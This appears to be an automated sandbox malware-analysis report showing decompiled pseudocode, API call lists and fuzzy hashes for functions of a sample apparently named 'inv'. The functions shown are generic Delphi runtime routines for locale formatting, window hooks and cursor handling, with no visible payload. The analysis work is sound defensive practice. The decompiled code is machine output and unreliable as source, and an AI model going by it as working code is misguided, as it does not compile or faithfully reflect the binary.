                                  Uniqueness Score: -1.00%

                                  Function 0041D79C, Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 40%
                                  			E0041D79C(intOrPtr __eax) {
				char _v5;
				intOrPtr _v12;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t21;
				intOrPtr _t30;
				void* _t32;
				void* _t34;
				intOrPtr _t35;

				_t32 = _t34;
				_t35 = _t34 + 0xfffffff8;
				_v5 = 0;
				if( *0x44f88c == 0) {
					return _v5;
				} else {
					_push(0);
					L004062C0();
					_v12 = __eax;
					_push(_t32);
					_push(0x41d822);
					_push( *[fs:edx]);
					 *[fs:edx] = _t35;
					_push(0x68);
					_t14 = _v12;
					_push(_t14);
					L00406058();
					if(_t14 >= 0x10) {
						_push(__eax + 4);
						_push(8);
						_push(0);
						_t18 =  *0x44f88c; // 0x46080752
						_push(_t18);
						L00406068();
						_push(__eax + ( *(__eax + 2) & 0x0000ffff) * 4 - 0x1c);
						_push(8);
						_push(8);
						_t21 =  *0x44f88c; // 0x46080752
						_push(_t21);
						L00406068();
						_v5 = 1;
					}
					_pop(_t30);
					 *[fs:eax] = _t30;
					_push(0x41d829);
					_t16 = _v12;
					_push(_t16);
					_push(0);
					L004064F8();
					return _t16;
				}
			}













                                  0x0041d79d
                                  0x0041d79f
                                  0x0041d7a5
                                  0x0041d7b0
                                  0x0041d830
                                  0x0041d7b2
                                  0x0041d7b2
                                  0x0041d7b4
                                  0x0041d7b9
                                  0x0041d7be
                                  0x0041d7bf
                                  0x0041d7c4
                                  0x0041d7c7
                                  0x0041d7ca
                                  0x0041d7cc
                                  0x0041d7cf
                                  0x0041d7d0
                                  0x0041d7d8
                                  0x0041d7dd
                                  0x0041d7de
                                  0x0041d7e0
                                  0x0041d7e2
                                  0x0041d7e7
                                  0x0041d7e8
                                  0x0041d7f5
                                  0x0041d7f6
                                  0x0041d7f8
                                  0x0041d7fa
                                  0x0041d7ff
                                  0x0041d800
                                  0x0041d805
                                  0x0041d805
                                  0x0041d80b
                                  0x0041d80e
                                  0x0041d811
                                  0x0041d816
                                  0x0041d819
                                  0x0041d81a
                                  0x0041d81c
                                  0x0041d821
                                  0x0041d821

                                  APIs
                                  • 72E7AC50.USER32(00000000), ref: 0041D7B4
                                  • 72E7AD70.GDI32(?,00000068,00000000,0041D822,?,00000000), ref: 0041D7D0
                                  • 72E7AEA0.GDI32(46080752,00000000,00000008,?,?,00000068,00000000,0041D822,?,00000000), ref: 0041D7E8
                                  • 72E7AEA0.GDI32(46080752,00000008,00000008,?,46080752,00000000,00000008,?,?,00000068,00000000,0041D822,?,00000000), ref: 0041D800
                                  • 72E7B380.USER32(00000000,?,0041D829,0041D822,?,00000000), ref: 0041D81C
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: B380
                                  • String ID:
                                  • API String ID: 120756276-0
                                  • Opcode ID: a53000a37de70687b86abe6fbc0761482c08e5cdff71ce1b13d44a83d769f45a
                                  • Instruction ID: 3f1e7269320f8a307ba32baaa60e5cdb219e8c3b7aa4220214eb653406664114
                                  • Opcode Fuzzy Hash: a53000a37de70687b86abe6fbc0761482c08e5cdff71ce1b13d44a83d769f45a
                                  • Instruction Fuzzy Hash: D2110875588304AEEB00EFE59C42FAD77E8E70A714F4080BAF504EA1C1DA7A5458C738
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040AB3C, Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 64%
                                  			E0040AB3C(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x40abd3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E0040A8B4(GetThreadLocale(), 0x40abe8, 0x100b,  &_v8);
				_t29 = E00407CB8(0x40abe8, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E0040AA88, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x44f76c;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E0040AAC4, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E0040ABDA);
				return E00403E10( &_v8);
			}










                                  0x0040ab3c
                                  0x0040ab3f
                                  0x0040ab44
                                  0x0040ab45
                                  0x0040ab4a
                                  0x0040ab4d
                                  0x0040ab63
                                  0x0040ab75
                                  0x0040ab7f
                                  0x0040ab8f
                                  0x0040ab94
                                  0x0040ab99
                                  0x0040ab9e
                                  0x0040ab9e
                                  0x0040aba4
                                  0x0040aba7
                                  0x0040aba7
                                  0x0040abb8
                                  0x0040abb8
                                  0x0040abbf
                                  0x0040abc2
                                  0x0040abc5
                                  0x0040abd2

                                  APIs
                                  • GetThreadLocale.KERNEL32(?,00000000,0040ABD3,?,?,00000000), ref: 0040AB54
                                    • Part of subcall function 0040A8B4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040A8D2
                                  • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040ABD3,?,?,00000000), ref: 0040AB84
                                  • EnumCalendarInfoA.KERNEL32(Function_0000AA88,00000000,00000000,00000004), ref: 0040AB8F
                                  • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040ABD3,?,?,00000000), ref: 0040ABAD
                                  • EnumCalendarInfoA.KERNEL32(Function_0000AAC4,00000000,00000000,00000003), ref: 0040ABB8
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Locale$InfoThread$CalendarEnum
                                  • String ID:
                                  • API String ID: 4102113445-0
                                  • Opcode ID: d0faf24535e3ffe9d5a4023c532492a4e138569dbb6e09e27ad6ab5d72db4ba6
                                  • Instruction ID: 1fa415aabdf6372b33d5677372d52cb1d4922124709160b95db0a19333158752
                                  • Opcode Fuzzy Hash: d0faf24535e3ffe9d5a4023c532492a4e138569dbb6e09e27ad6ab5d72db4ba6
                                  • Instruction Fuzzy Hash: 2601D431604B046BE201A765CD12F6B326DDB46714FA04577B900B66C1D67CAE1086AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00449B1C, Relevance: 7.5, APIs: 5, Instructions: 25synchronizationthreadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00449B1C() {
				void* _t2;
				void* _t5;
				void* _t8;
				struct HHOOK__* _t10;

				if( *0x44fbc8 != 0) {
					_t10 =  *0x44fbc8; // 0x0
					UnhookWindowsHookEx(_t10);
				}
				 *0x44fbc8 = 0;
				if( *0x44fbcc != 0) {
					_t2 =  *0x44fbc4; // 0x0
					SetEvent(_t2);
					if(GetCurrentThreadId() !=  *0x44fbc0) {
						_t8 =  *0x44fbcc; // 0x0
						WaitForSingleObject(_t8, 0xffffffff);
					}
					_t5 =  *0x44fbcc; // 0x0
					CloseHandle(_t5);
					 *0x44fbcc = 0;
					return 0;
				}
				return 0;
			}







                                  0x00449b23
                                  0x00449b25
                                  0x00449b2b
                                  0x00449b2b
                                  0x00449b32
                                  0x00449b3e
                                  0x00449b40
                                  0x00449b46
                                  0x00449b56
                                  0x00449b5a
                                  0x00449b60
                                  0x00449b60
                                  0x00449b65
                                  0x00449b6b
                                  0x00449b72
                                  0x00000000
                                  0x00449b72
                                  0x00449b77

                                  APIs
                                  • UnhookWindowsHookEx.USER32(00000000), ref: 00449B2B
                                  • SetEvent.KERNEL32(00000000,0044BE1A,00000000,0044AF47,?,?,0044C944,00000001,0044B007,?,?,?,0044C944), ref: 00449B46
                                  • GetCurrentThreadId.KERNEL32 ref: 00449B4B
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0044BE1A,00000000,0044AF47,?,?,0044C944,00000001,0044B007,?,?,?,0044C944), ref: 00449B60
                                  • CloseHandle.KERNEL32(00000000,00000000,0044BE1A,00000000,0044AF47,?,?,0044C944,00000001,0044B007,?,?,?,0044C944), ref: 00449B6B
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                                  • String ID:
                                  • API String ID: 2429646606-0
                                  • Opcode ID: 86f335ad5c5060fbf341c222ea07d14704cf5483b23d9420d9915cf58a6bd967
                                  • Instruction ID: 4ea1f00dfe9c5f4b141374f63fb96cf3fc41f1b3c24dc773aef81f597fe85241
                                  • Opcode Fuzzy Hash: 86f335ad5c5060fbf341c222ea07d14704cf5483b23d9420d9915cf58a6bd967
                                  • Instruction Fuzzy Hash: 29F074B95005C19AE751EB69E869A0732A8E717304B50453FE120D72E1E678B848DF1C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042CBA8, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 168COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 76%
                                  			E0042CBA8(void* __eax, intOrPtr __ecx, intOrPtr __edx, char _a4) {
				intOrPtr _v8;
				char _v9;
				intOrPtr _v16;
				struct tagPOINT _v32;
				intOrPtr _v36;
				long _v40;
				char _v56;
				void* __edi;
				struct HWND__* _t57;
				void* _t63;
				char _t84;
				struct HWND__* _t108;
				void* _t110;
				intOrPtr _t134;
				intOrPtr _t137;
				void* _t141;
				struct HWND__* _t143;
				struct HWND__* _t147;
				void* _t152;
				void* _t154;
				intOrPtr _t155;

				_t152 = _t154;
				_t155 = _t154 + 0xffffffcc;
				_v8 = __ecx;
				_t137 = __edx;
				_t110 = __eax;
				if(__edx == 0 || __edx == 0xffffffff) {
					_t57 =  *(_t110 + 0xa0);
					if(_t57 == 0 ||  *((char*)(_t57 + 0x1a7)) == 0 ||  *((intOrPtr*)(_t57 + 0x17c)) == 0) {
						E004120C8( *((intOrPtr*)(_t110 + 0x40)),  &_v40,  *((intOrPtr*)(_t110 + 0x44)));
						_v32.x = _v40;
						_v32.y = _v36;
						_t143 =  *(_t110 + 0x30);
						__eflags = _t143;
						if(_t143 != 0) {
							E0042BA08(_t143,  &_v40,  &_v32);
							_v32.x = _v40;
							_v32.y = _v36;
						}
					} else {
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t57 + 0x17c)))) + 0x14))();
						MapWindowPoints(E004325A4( *(_t110 + 0xa0)), 0,  &_v32, 2);
					}
					_t63 = E0042BE70(_t110);
					E00412118(_v32.x, E0042BE84(_t110), _v32.y,  &_v56, _t63);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v9 = E0042CD88(_t110,  &_v32);
					goto L20;
				} else {
					E0042D090(__eax);
					__eflags =  *(_t110 + 0xa0);
					if(__eflags == 0) {
						L12:
						_t84 = 1;
					} else {
						_t108 = E004032D4( *(_t110 + 0xa0), __eflags);
						__eflags = _t108;
						if(_t108 != 0) {
							goto L12;
						} else {
							_t84 = 0;
						}
					}
					_v9 = _t84;
					__eflags = _v9;
					if(_v9 == 0) {
						L20:
						return _v9;
					} else {
						_v16 = E00429604(1, _t137);
						_push(_t152);
						_push(0x42cd73);
						_push( *[fs:edx]);
						 *[fs:edx] = _t155;
						_t87 =  *(_t110 + 0xa0);
						__eflags =  *(_t110 + 0xa0);
						if( *(_t110 + 0xa0) == 0) {
							_t147 = 0;
							__eflags = 0;
						} else {
							_t147 = E004325A4(_t87);
						}
						E0042B890(_t110,  &_v32);
						__eflags = _t147;
						if(__eflags != 0) {
							MapWindowPoints(_t147, 0,  &_v32, 2);
						}
						 *((intOrPtr*)(_v16 + 4)) = _t137;
						 *((char*)(_v16 + 0x54)) = _a4;
						 *((intOrPtr*)(_v16 + 0x58)) = _v8;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t141 = _t137;
						MapWindowPoints(0, E004325A4(_t141),  &_v32, 1);
						_push(_v32.y);
						E004032D4(_t141, __eflags);
						__eflags = 0;
						_pop(_t134);
						 *[fs:eax] = _t134;
						_push(0x42cd7a);
						return E004030D8(_v16);
					}
				}
			}
























                                  0x0042cba9
                                  0x0042cbab
                                  0x0042cbb1
                                  0x0042cbb4
                                  0x0042cbb6
                                  0x0042cbba
                                  0x0042cbc5
                                  0x0042cbcd
                                  0x0042cc15
                                  0x0042cc1d
                                  0x0042cc23
                                  0x0042cc26
                                  0x0042cc29
                                  0x0042cc2b
                                  0x0042cc35
                                  0x0042cc3d
                                  0x0042cc43
                                  0x0042cc43
                                  0x0042cbe1
                                  0x0042cbee
                                  0x0042cc05
                                  0x0042cc05
                                  0x0042cc48
                                  0x0042cc61
                                  0x0042cc6c
                                  0x0042cc6d
                                  0x0042cc6e
                                  0x0042cc6f
                                  0x0042cc7a
                                  0x00000000
                                  0x0042cc82
                                  0x0042cc84
                                  0x0042cc89
                                  0x0042cc90
                                  0x0042ccad
                                  0x0042ccad
                                  0x0042cc92
                                  0x0042cca0
                                  0x0042cca5
                                  0x0042cca7
                                  0x00000000
                                  0x0042cca9
                                  0x0042cca9
                                  0x0042cca9
                                  0x0042cca7
                                  0x0042ccaf
                                  0x0042ccb2
                                  0x0042ccb6
                                  0x0042cd7a
                                  0x0042cd83
                                  0x0042ccbc
                                  0x0042ccca
                                  0x0042cccf
                                  0x0042ccd0
                                  0x0042ccd5
                                  0x0042ccd8
                                  0x0042ccdb
                                  0x0042cce1
                                  0x0042cce3
                                  0x0042ccee
                                  0x0042ccee
                                  0x0042cce5
                                  0x0042ccea
                                  0x0042ccea
                                  0x0042ccf5
                                  0x0042ccfa
                                  0x0042ccfc
                                  0x0042cd07
                                  0x0042cd07
                                  0x0042cd0f
                                  0x0042cd18
                                  0x0042cd21
                                  0x0042cd2e
                                  0x0042cd2f
                                  0x0042cd30
                                  0x0042cd31
                                  0x0042cd32
                                  0x0042cd43
                                  0x0042cd4b
                                  0x0042cd58
                                  0x0042cd5d
                                  0x0042cd5f
                                  0x0042cd62
                                  0x0042cd65
                                  0x0042cd72
                                  0x0042cd72
                                  0x0042ccb6

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: PointsWindow
                                  • String ID: 8rB
                                  • API String ID: 4123100037-1357010674
                                  • Opcode ID: d1307cd5415c168ab225a56a6b6d988fa2e557369e10f0290c0ec399209822a2
                                  • Instruction ID: 7dc3623a035d7281e8cbb3c56c568e73e875cb2af8f6d691574d10e1a079e9a8
                                  • Opcode Fuzzy Hash: d1307cd5415c168ab225a56a6b6d988fa2e557369e10f0290c0ec399209822a2
                                  • Instruction Fuzzy Hash: 9C518171B005189FCB01DFA9D881AEEB7F5AF49304F5580BAEC14AB381C779AE05CB65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040ABEC, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E0040ABEC(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t41;
				signed int _t45;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x40adb6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E00403E10(__edx);
				E0040A8B4(GetThreadLocale(), 0x40adcc, 0x1009,  &_v12);
				if(E00407CB8(0x40adcc, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t41 = E004040D0(_t124);
						__eflags = _t92 - _t41;
						if(_t92 > _t41) {
							goto L28;
						}
						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
						asm("bt [0x44d10c], eax");
						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
							_t45 = E00408268(_t124 + _t92 - 1, 2, 0x40add0);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E00408268(_t124 + _t92 - 1, 4, 0x40ade0);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E00408268(_t124 + _t92 - 1, 2, 0x40adf8);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 =  *(_t124 + _t92 - 1) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E004040D8(_t122, 0x40ae10);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E00403FF8();
												E004040D8(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E004040D8(_t122, 0x40ae04);
										_t92 = _t92 + 1;
									}
								} else {
									E004040D8(_t122, 0x40adf0);
									_t92 = _t92 + 3;
								}
							} else {
								E004040D8(_t122, 0x40addc);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E0040BC5C(_t124, _t92);
							E00404330(_t124, _v8, _t92,  &_v20);
							E004040D8(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x44f744; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E00403E64(_t122, _t124);
					} else {
						while(_t92 <= E004040D0(_t124)) {
							_t83 =  *(_t124 + _t92 - 1) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E00403FF8();
									E004040D8(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E0040ADBD);
				return E00403E34( &_v24, 4);
			}























                                  0x0040abec
                                  0x0040abf1
                                  0x0040abf2
                                  0x0040abf3
                                  0x0040abf4
                                  0x0040abf5
                                  0x0040abf9
                                  0x0040abfb
                                  0x0040abff
                                  0x0040ac00
                                  0x0040ac05
                                  0x0040ac08
                                  0x0040ac0b
                                  0x0040ac12
                                  0x0040ac2a
                                  0x0040ac42
                                  0x0040ad8c
                                  0x0040ad8e
                                  0x0040ad93
                                  0x0040ad95
                                  0x00000000
                                  0x00000000
                                  0x0040acab
                                  0x0040acb0
                                  0x0040acb7
                                  0x0040acf5
                                  0x0040acfa
                                  0x0040acfc
                                  0x0040ad1b
                                  0x0040ad20
                                  0x0040ad22
                                  0x0040ad43
                                  0x0040ad48
                                  0x0040ad4a
                                  0x0040ad5f
                                  0x0040ad5f
                                  0x0040ad61
                                  0x0040ad67
                                  0x0040ad6e
                                  0x0040ad63
                                  0x0040ad63
                                  0x0040ad65
                                  0x0040ad7c
                                  0x0040ad86
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040ad65
                                  0x0040ad4c
                                  0x0040ad53
                                  0x0040ad58
                                  0x0040ad58
                                  0x0040ad24
                                  0x0040ad2b
                                  0x0040ad30
                                  0x0040ad30
                                  0x0040acfe
                                  0x0040ad05
                                  0x0040ad0a
                                  0x0040ad0a
                                  0x0040ad8b
                                  0x0040ad8b
                                  0x0040acb9
                                  0x0040acc2
                                  0x0040acd0
                                  0x0040acda
                                  0x0040acdf
                                  0x0040acdf
                                  0x0040acb7
                                  0x0040ac48
                                  0x0040ac48
                                  0x0040ac4d
                                  0x0040ac50
                                  0x0040ac5e
                                  0x0040ac5a
                                  0x0040ac5a
                                  0x0040ac5a
                                  0x0040ac62
                                  0x0040ac9d
                                  0x0040ac64
                                  0x0040ac89
                                  0x0040ac6a
                                  0x0040ac6a
                                  0x0040ac6c
                                  0x0040ac6e
                                  0x0040ac70
                                  0x0040ac79
                                  0x0040ac83
                                  0x0040ac83
                                  0x0040ac70
                                  0x0040ac88
                                  0x0040ac88
                                  0x0040ac88
                                  0x0040ac94
                                  0x0040ac62
                                  0x0040ad9b
                                  0x0040ad9d
                                  0x0040ada0
                                  0x0040ada3
                                  0x0040adb5

                                  APIs
                                  • GetThreadLocale.KERNEL32(?,00000000,0040ADB6,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040AC1B
                                    • Part of subcall function 0040A8B4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040A8D2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Locale$InfoThread
                                  • String ID: eeee$ggg$yyyy
                                  • API String ID: 4232894706-1253427255
                                  • Opcode ID: d23e4e25ba7abd3228bbbc98e1209934ec096afc2004c937ba1f02e5efa24b4e
                                  • Instruction ID: 240647d738f01ce04a004467147e7c82f5a71e5866ad3678d97b55430a5f9ffb
                                  • Opcode Fuzzy Hash: d23e4e25ba7abd3228bbbc98e1209934ec096afc2004c937ba1f02e5efa24b4e
                                  • Instruction Fuzzy Hash: 8B4114713047004BD711BA7988812BEB3ABDF80304B64843BE951B3BC5D63C9D26966F
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042A0D0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E0042A0D0(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, void* __ebp, long long __fp0) {
				intOrPtr _v16;
				intOrPtr _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				struct HWND__* _t38;
				intOrPtr _t39;
				intOrPtr* _t41;
				intOrPtr _t45;
				intOrPtr _t49;
				intOrPtr* _t53;
				long _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr* _t65;
				intOrPtr _t66;
				intOrPtr _t70;
				intOrPtr* _t77;
				void* _t79;
				intOrPtr* _t80;
				long long _t87;

				_t87 = __fp0;
				_t80 = _t79 + 0xfffffff8;
				_t70 = __ecx;
				_t45 = __edx;
				_t77 = __eax;
				 *0x44fb30 = __eax;
				_t24 =  *0x44fb30; // 0x0
				 *((intOrPtr*)(_t24 + 4)) = 0;
				GetCursorPos(0x44fb3c);
				_t26 =  *0x44fb30; // 0x0
				_t58 = 0x44fb3c->x; // 0x0
				 *(_t26 + 0xc) = _t58;
				_t59 =  *0x44fb40; // 0x0
				 *((intOrPtr*)(_t26 + 0x10)) = _t59;
				 *0x44fb44 = GetCursor();
				_t28 =  *0x44fb30; // 0x0
				 *0x44fb38 = E004292FC(_t28);
				 *0x44fb48 = _t70;
				_t60 =  *0x4271ec; // 0x427238
				if(E00403264(_t77, _t60) == 0) {
					__eflags = _t45;
					if(__eflags == 0) {
						 *0x44fb4c = 0;
					} else {
						 *0x44fb4c = 1;
					}
				} else {
					_t65 = _t77;
					_t4 = _t65 + 0x44; // 0x44
					_t41 = _t4;
					_t49 =  *_t41;
					if( *((intOrPtr*)(_t41 + 8)) - _t49 <= 0) {
						__eflags = 0;
						 *((intOrPtr*)(_t65 + 0x20)) = 0;
						 *((intOrPtr*)(_t65 + 0x24)) = 0;
					} else {
						 *_t80 =  *((intOrPtr*)(_t65 + 0xc)) - _t49;
						asm("fild dword [esp]");
						_v16 =  *((intOrPtr*)(_t41 + 8)) -  *_t41;
						asm("fild dword [esp+0x4]");
						asm("fdivp st1, st0");
						 *((long long*)(_t65 + 0x20)) = __fp0;
						asm("wait");
					}
					_t66 =  *((intOrPtr*)(_t41 + 4));
					if( *((intOrPtr*)(_t41 + 0xc)) - _t66 <= 0) {
						__eflags = 0;
						 *((intOrPtr*)(_t77 + 0x28)) = 0;
						 *((intOrPtr*)(_t77 + 0x2c)) = 0;
					} else {
						_t53 = _t77;
						 *_t80 =  *((intOrPtr*)(_t53 + 0x10)) - _t66;
						asm("fild dword [esp]");
						_v16 =  *((intOrPtr*)(_t41 + 0xc)) -  *((intOrPtr*)(_t41 + 4));
						asm("fild dword [esp+0x4]");
						asm("fdivp st1, st0");
						 *((long long*)(_t53 + 0x28)) = _t87;
						asm("wait");
					}
					if(_t45 == 0) {
						 *0x44fb4c = 0;
					} else {
						 *0x44fb4c = 2;
						 *((intOrPtr*)( *_t77 + 0x30))();
					}
				}
				_t32 =  *0x44fb30; // 0x0
				 *0x44fb50 =  *((intOrPtr*)( *_t32 + 8))();
				_t85 =  *0x44fb50;
				if( *0x44fb50 != 0) {
					_t37 =  *0x44fb40; // 0x0
					_t38 = GetDesktopWindow();
					_t39 =  *0x44fb50; // 0x0
					E00433DA0(_t39, _t38, _t85, _t37);
				}
				_t35 = E004030A8(1);
				 *0x44fb58 = _t35;
				if( *0x44fb4c != 0) {
					_t35 = E00429E00(0x44fb3c, 1);
				}
				return _t35;
			}


























                                  0x0042a0d0
                                  0x0042a0d3
                                  0x0042a0d6
                                  0x0042a0d8
                                  0x0042a0da
                                  0x0042a0dc
                                  0x0042a0e2
                                  0x0042a0e9
                                  0x0042a0f1
                                  0x0042a0f6
                                  0x0042a0fb
                                  0x0042a101
                                  0x0042a104
                                  0x0042a10a
                                  0x0042a112
                                  0x0042a117
                                  0x0042a121
                                  0x0042a126
                                  0x0042a12e
                                  0x0042a13b
                                  0x0042a1cd
                                  0x0042a1cf
                                  0x0042a1da
                                  0x0042a1d1
                                  0x0042a1d1
                                  0x0042a1d1
                                  0x0042a141
                                  0x0042a141
                                  0x0042a143
                                  0x0042a143
                                  0x0042a149
                                  0x0042a14f
                                  0x0042a171
                                  0x0042a173
                                  0x0042a176
                                  0x0042a151
                                  0x0042a156
                                  0x0042a159
                                  0x0042a161
                                  0x0042a165
                                  0x0042a169
                                  0x0042a16b
                                  0x0042a16e
                                  0x0042a16e
                                  0x0042a17c
                                  0x0042a183
                                  0x0042a1a8
                                  0x0042a1aa
                                  0x0042a1ad
                                  0x0042a185
                                  0x0042a185
                                  0x0042a18c
                                  0x0042a18f
                                  0x0042a198
                                  0x0042a19c
                                  0x0042a1a0
                                  0x0042a1a2
                                  0x0042a1a5
                                  0x0042a1a5
                                  0x0042a1b2
                                  0x0042a1c4
                                  0x0042a1b4
                                  0x0042a1b4
                                  0x0042a1bf
                                  0x0042a1bf
                                  0x0042a1b2
                                  0x0042a1e1
                                  0x0042a1eb
                                  0x0042a1f0
